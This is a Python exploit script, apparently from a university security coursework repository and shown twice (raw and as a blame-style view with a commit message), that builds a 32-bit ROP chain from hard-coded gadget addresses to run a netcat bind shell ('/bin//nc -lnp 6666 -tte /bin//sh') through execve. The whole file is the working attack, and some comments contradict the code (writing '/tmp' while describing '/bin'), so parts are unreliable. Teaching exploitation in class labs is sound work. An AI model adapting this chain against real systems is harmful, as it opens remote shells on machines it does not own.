security-cw/docs/exploit-nc.py

"""
This is a demo python script that creates a ROP chain to launch nc as:
> /bin//nc -lnp 6666 -tte /bin//sh
The gadgets in the following code are based on my machine & binary and as a result you will have to adjust the gadget based on your environment.
With the latest ROPGadget tool that we used in the class, we get the following ropchain:
- Step 1 -- Write-what-where gadgets

	[+] Gadget found: 0x8056d05 mov dword ptr [edx], eax ; ret
	[+] Gadget found: 0x806ee8b pop edx ; ret
	[+] Gadget found: 0x80a8bf6 pop eax ; ret
	[+] Gadget found: 0x80562c0 xor eax, eax ; ret

- Step 2 -- Init syscall number gadgets

	[+] Gadget found: 0x80562c0 xor eax, eax ; ret
	[+] Gadget found: 0x807c32a inc eax ; ret

- Step 3 -- Init syscall arguments gadgets

	[+] Gadget found: 0x80481c9 pop ebx ; ret
	[+] Gadget found: 0x806eeb2 pop ecx ; pop ebx ; ret
	[+] Gadget found: 0x806ee8b pop edx ; ret

- Step 4 -- Syscall gadget

	[+] Gadget found: 0x8049603 int 0x80

- Step 5 -- Build the ROP chain


"""


#!/usr/bin/env python
from struct import pack
import os
######################################
fileName=raw_input("Enter the file name")
outfile=open(fileName, "wb")
# this is just to create variables of the gadgets that we will be using
DATA       = 0x080da120
EDAX0      = pack("<I", 0x08050a88)
STACK      = pack("<I", DATA)       # @ .data 
INT80      = pack("<I", 0x08049603) # int 0x80
MOVISTACK  = pack("<I", 0x08056d05) # mov dword ptr [edx], eax ; ret
INCEAX     = pack("<I", 0x0807c32a) # inc eax ; ret
POPEDX     = pack("<I", 0x0806ee8b) # pop edx ; ret
POPECXEBX  = pack("<I", 0x0806eeb2) # pop ecx ; pop ebx ; ret
POPEAX     = pack("<I", 0x080a8bf6) # pop eax ; ret
XOREAX     = pack("<I", 0x080562c0) # xor eax, eax ; ret
DUMMY      = pack("<I", 0x42424242) # padding

buff  = "\x42" * 32
buff += "BBBB"*3

buff += POPEDX 				# it's via %ecx we will build our stack.
buff += STACK				# %ecx contain the stack address.

buff += POPEAX				# Lets put content in an address
buff += "/tmp"				# put "/usr" in %eax
buff += MOVISTACK			# put "/bin" in stack address

buff += POPEDX
buff += pack("<I", DATA + 4)	# we change our stack for to point after "/bin"

buff += POPEAX				# Applying the same for "/nc"
buff += "//nc"
buff += MOVISTACK			# we place "//nc" after "/bin"

buff += POPEDX
buff += pack("<I", DATA + 9)	# we change our stack for to point after "bin//nc"+1

# we repeated operation for each argument
buff += POPEAX
buff += "-lnp"
buff += MOVISTACK

buff += POPEDX
buff += pack("<I", DATA + 14)

buff += POPEAX
buff += "6666"
buff += MOVISTACK

buff += POPEDX
buff += pack("<I", DATA + 19)

buff += POPEAX
buff += "-tte"
buff += MOVISTACK

buff += POPEDX
buff += pack("<I", DATA + 24)

buff += POPEAX
buff += "/bin"
buff += MOVISTACK

buff += POPEDX
buff += pack("<I", DATA + 28)

buff += POPEAX
buff += "//sh"
buff += MOVISTACK

#
# We currently have our list of elements separated by \0
# Now we must construct our char ** i.e. array 'argguments' of strings
# arguments=[ @"/bin//nc", @"-lnp", @"6666", @"-tte", @"/bin//sh"]
# 

buff += POPEDX				
buff += pack("<I", DATA + 60)	# shadow stack address (@ of arguments)

buff += POPEAX
buff += pack("<I", DATA) 		# @ of "/bin//nc" 0th item of arguments[]
buff += MOVISTACK			# we place address of "/bin//nc" in our STACK

buff += POPEDX
buff += pack("<I", DATA + 64)	# we shift our Stack Pointer + 4 for the second argument

buff += POPEAX
buff += pack("<I", DATA + 0x9) 		# @ of "-lnp"
buff += MOVISTACK			# we place address of "-lnp" in our STACK

buff += POPEDX
buff += pack("<I", DATA + 68)	# we shift our Stack Pointer + 4 for the 3rd argument

buff += POPEAX
buff += pack("<I", DATA + 0xe) 		# @ of "6666"
buff += MOVISTACK			# we palce address of "6666" in our STACK

buff += POPEDX
buff += pack("<I", DATA + 72)	# we shift our Stack Pointer + 4 for the 4th argument

buff += POPEAX
buff += pack("<I", DATA + 0x13) 		# @ of "-tte"
buff += MOVISTACK			# we place address of "-tte" in our STACK

buff += POPEDX
buff += pack("<I", DATA + 76)	# we shift our Stack Pointer + 4 for the 5th argument

buff += POPEAX
buff += pack("<I", DATA + 0x18) 		# @ of "/bin//sh"
buff += MOVISTACK			# we place address of "/bin//sh" in our STACK

    #
    # Now we must implement eax to contain the address of 
    # the execve syscall.
    # execve = 0xb
    #

buff += XOREAX				# %eax is put to zero.
buff += INCEAX * 11			# %eax is now 0xb
buff += POPEDX				# last pop 
buff += pack("<I", DATA + 48) 	# edx char *env
buff += POPECXEBX				# last pop 
buff += pack("<I", DATA + 60) 	# ecx char **arguments
buff += pack("<I", DATA)      	# ebx "/usr/bin//nc"
buff += INT80				# we execute
outfile.write(buff)
outfile.close()

#print buff
Add example scripts Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com> Co-authored-by: jack bond-preston <jackbondpreston@outlook.com> 2020-11-28 17:40:49 +00:00			`"""`
			`This is a demo python script that creates a ROP chain to launch nc as:`
			`> /bin//nc -lnp 6666 -tte /bin//sh`
			`The gadgets in the following code are based on my machine & binary and as a result you will have to adjust the gadget based on your environment.`
			`With the latest ROPGadget tool that we used in the class, we get the following ropchain:`
			`- Step 1 -- Write-what-where gadgets`

			`[+] Gadget found: 0x8056d05 mov dword ptr [edx], eax ; ret`
			`[+] Gadget found: 0x806ee8b pop edx ; ret`
			`[+] Gadget found: 0x80a8bf6 pop eax ; ret`
			`[+] Gadget found: 0x80562c0 xor eax, eax ; ret`

			`- Step 2 -- Init syscall number gadgets`

			`[+] Gadget found: 0x80562c0 xor eax, eax ; ret`
			`[+] Gadget found: 0x807c32a inc eax ; ret`

			`- Step 3 -- Init syscall arguments gadgets`

			`[+] Gadget found: 0x80481c9 pop ebx ; ret`
			`[+] Gadget found: 0x806eeb2 pop ecx ; pop ebx ; ret`
			`[+] Gadget found: 0x806ee8b pop edx ; ret`

			`- Step 4 -- Syscall gadget`

			`[+] Gadget found: 0x8049603 int 0x80`

			`- Step 5 -- Build the ROP chain`



			`"""`





			`#!/usr/bin/env python`
			`from struct import pack`
			`import os`
			`######################################`
			`fileName=raw_input("Enter the file name")`
			`outfile=open(fileName, "wb")`
			`# this is just to create variables of the gadgets that we will be using`
			`DATA = 0x080da120`
			`EDAX0 = pack("<I", 0x08050a88)`
			`STACK = pack("<I", DATA) # @ .data`
			`INT80 = pack("<I", 0x08049603) # int 0x80`
			`MOVISTACK = pack("<I", 0x08056d05) # mov dword ptr [edx], eax ; ret`
			`INCEAX = pack("<I", 0x0807c32a) # inc eax ; ret`
			`POPEDX = pack("<I", 0x0806ee8b) # pop edx ; ret`
			`POPECXEBX = pack("<I", 0x0806eeb2) # pop ecx ; pop ebx ; ret`
			`POPEAX = pack("<I", 0x080a8bf6) # pop eax ; ret`
			`XOREAX = pack("<I", 0x080562c0) # xor eax, eax ; ret`
			`DUMMY = pack("<I", 0x42424242) # padding`

			`buff = "\x42" * 32`
			`buff += "BBBB"*3`

			`buff += POPEDX # it's via %ecx we will build our stack.`
			`buff += STACK # %ecx contain the stack address.`

			`buff += POPEAX # Lets put content in an address`
			`buff += "/tmp" # put "/usr" in %eax`
			`buff += MOVISTACK # put "/bin" in stack address`

			`buff += POPEDX`
			`buff += pack("<I", DATA + 4) # we change our stack for to point after "/bin"`

			`buff += POPEAX # Applying the same for "/nc"`
			`buff += "//nc"`
			`buff += MOVISTACK # we place "//nc" after "/bin"`

			`buff += POPEDX`
			`buff += pack("<I", DATA + 9) # we change our stack for to point after "bin//nc"+1`

			`# we repeated operation for each argument`
			`buff += POPEAX`
			`buff += "-lnp"`
			`buff += MOVISTACK`

			`buff += POPEDX`
			`buff += pack("<I", DATA + 14)`

			`buff += POPEAX`
			`buff += "6666"`
			`buff += MOVISTACK`

			`buff += POPEDX`
			`buff += pack("<I", DATA + 19)`

			`buff += POPEAX`
			`buff += "-tte"`
			`buff += MOVISTACK`

			`buff += POPEDX`
			`buff += pack("<I", DATA + 24)`

			`buff += POPEAX`
			`buff += "/bin"`
			`buff += MOVISTACK`

			`buff += POPEDX`
			`buff += pack("<I", DATA + 28)`

			`buff += POPEAX`
			`buff += "//sh"`
			`buff += MOVISTACK`

			`#`
			`# We currently have our list of elements separated by \0`
			`# Now we must construct our char ** i.e. array 'argguments' of strings`
			`# arguments=[ @"/bin//nc", @"-lnp", @"6666", @"-tte", @"/bin//sh"]`
			`#`

			`buff += POPEDX`
			`buff += pack("<I", DATA + 60) # shadow stack address (@ of arguments)`

			`buff += POPEAX`
			`buff += pack("<I", DATA) # @ of "/bin//nc" 0th item of arguments[]`
			`buff += MOVISTACK # we place address of "/bin//nc" in our STACK`

			`buff += POPEDX`
			`buff += pack("<I", DATA + 64) # we shift our Stack Pointer + 4 for the second argument`

			`buff += POPEAX`
			`buff += pack("<I", DATA + 0x9) # @ of "-lnp"`
			`buff += MOVISTACK # we place address of "-lnp" in our STACK`

			`buff += POPEDX`
			`buff += pack("<I", DATA + 68) # we shift our Stack Pointer + 4 for the 3rd argument`

			`buff += POPEAX`
			`buff += pack("<I", DATA + 0xe) # @ of "6666"`
			`buff += MOVISTACK # we palce address of "6666" in our STACK`

			`buff += POPEDX`
			`buff += pack("<I", DATA + 72) # we shift our Stack Pointer + 4 for the 4th argument`

			`buff += POPEAX`
			`buff += pack("<I", DATA + 0x13) # @ of "-tte"`
			`buff += MOVISTACK # we place address of "-tte" in our STACK`

			`buff += POPEDX`
			`buff += pack("<I", DATA + 76) # we shift our Stack Pointer + 4 for the 5th argument`

			`buff += POPEAX`
			`buff += pack("<I", DATA + 0x18) # @ of "/bin//sh"`
			`buff += MOVISTACK # we place address of "/bin//sh" in our STACK`

			`#`
			`# Now we must implement eax to contain the address of`
			`# the execve syscall.`
			`# execve = 0xb`
			`#`

			`buff += XOREAX # %eax is put to zero.`
			`buff += INCEAX * 11 # %eax is now 0xb`
			`buff += POPEDX # last pop`
			`buff += pack("<I", DATA + 48) # edx char *env`
			`buff += POPECXEBX # last pop`
			`buff += pack("<I", DATA + 60) # ecx char **arguments`
			`buff += pack("<I", DATA) # ebx "/usr/bin//nc"`
			`buff += INT80 # we execute`
			`outfile.write(buff)`
			`outfile.close()`

			`#print buff`